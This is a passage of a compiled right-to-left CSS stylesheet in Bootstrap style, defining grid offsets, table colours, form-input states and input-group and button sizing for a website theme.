    left: 33.33333333%;
  }
  .col-md-pull-3 {
    left: 25%;
  }
  .col-md-pull-2 {
    left: 16.66666667%;
  }
  .col-md-pull-1 {
    left: 8.33333333%;
  }
  .col-md-pull-0 {
    left: auto;
  }
  .col-md-push-12 {
    right: 100%;
  }
  .col-md-push-11 {
    right: 91.66666667%;
  }
  .col-md-push-10 {
    right: 83.33333333%;
  }
  .col-md-push-9 {
    right: 75%;
  }
  .col-md-push-8 {
    right: 66.66666667%;
  }
  .col-md-push-7 {
    right: 58.33333333%;
  }
  .col-md-push-6 {
    right: 50%;
  }
  .col-md-push-5 {
    right: 41.66666667%;
  }
  .col-md-push-4 {
    right: 33.33333333%;
  }
  .col-md-push-3 {
    right: 25%;
  }
  .col-md-push-2 {
    right: 16.66666667%;
  }
  .col-md-push-1 {
    right: 8.33333333%;
  }
  .col-md-push-0 {
    right: auto;
  }
  .col-md-offset-12 {
    margin-right: 100%;
  }
  .col-md-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-right: 75%;
  }
  .col-md-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-right: 50%;
  }
  .col-md-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-right: 25%;
  }
  .col-md-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: right;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    left: 100%;
  }
  .col-lg-pull-11 {
    left: 91.66666667%;
  }
  .col-lg-pull-10 {
    left: 83.33333333%;
  }
  .col-lg-pull-9 {
    left: 75%;
  }
  .col-lg-pull-8 {
    left: 66.66666667%;
  }
  .col-lg-pull-7 {
    left: 58.33333333%;
  }
  .col-lg-pull-6 {
    left: 50%;
  }
  .col-lg-pull-5 {
    left: 41.66666667%;
  }
  .col-lg-pull-4 {
    left: 33.33333333%;
  }
  .col-lg-pull-3 {
    left: 25%;
  }
  .col-lg-pull-2 {
    left: 16.66666667%;
  }
  .col-lg-pull-1 {
    left: 8.33333333%;
  }
  .col-lg-pull-0 {
    left: auto;
  }
  .col-lg-push-12 {
    right: 100%;
  }
  .col-lg-push-11 {
    right: 91.66666667%;
  }
  .col-lg-push-10 {
    right: 83.33333333%;
  }
  .col-lg-push-9 {
    right: 75%;
  }
  .col-lg-push-8 {
    right: 66.66666667%;
  }
  .col-lg-push-7 {
    right: 58.33333333%;
  }
  .col-lg-push-6 {
    right: 50%;
  }
  .col-lg-push-5 {
    right: 41.66666667%;
  }
  .col-lg-push-4 {
    right: 33.33333333%;
  }
  .col-lg-push-3 {
    right: 25%;
  }
  .col-lg-push-2 {
    right: 16.66666667%;
  }
  .col-lg-push-1 {
    right: 8.33333333%;
  }
  .col-lg-push-0 {
    right: auto;
  }
  .col-lg-offset-12 {
    margin-right: 100%;
  }
  .col-lg-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-right: 75%;
  }
  .col-lg-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-right: 50%;
  }
  .col-lg-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-right: 25%;
  }
  .col-lg-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-right: 0%;
  }
}
table {
  background-color: transparent;
}
table col[class*="col-"] {
  position: static;
  display: table-column;
  float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  display: table-cell;
  float: none;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: right;
}
th {
  text-align: right;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  min-height: .01%;
  overflow-x: auto;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select::-ms-expand,
textarea::-ms-expand,
input[type="text"]::-ms-expand,
input[type="password"]::-ms-expand,
input[type="datetime"]::-ms-expand,
input[type="datetime-local"]::-ms-expand,
input[type="date"]::-ms-expand,
input[type="month"]::-ms-expand,
input[type="time"]::-ms-expand,
input[type="week"]::-ms-expand,
input[type="number"]::-ms-expand,
input[type="email"]::-ms-expand,
input[type="url"]::-ms-expand,
input[type="search"]::-ms-expand,
input[type="tel"]::-ms-expand,
input[type="color"]::-ms-expand,
.inputbox::-ms-expand {
  background-color: transparent;
  border: 0;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: right;
    width: 160px;
    padding-top: 5px;
    text-align: left;
  }
}
.form-horizontal .control-group .controls {
  margin-right: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-right: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-right: 0;
  vertical-align: top;
  border-radius: 0 0 0 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-left: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0 0 0 0;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0 0 0 0;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0 0 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-right: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-left: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-right: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-right: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: 700;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  -webkit-appearance: none;
  appearance: none;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
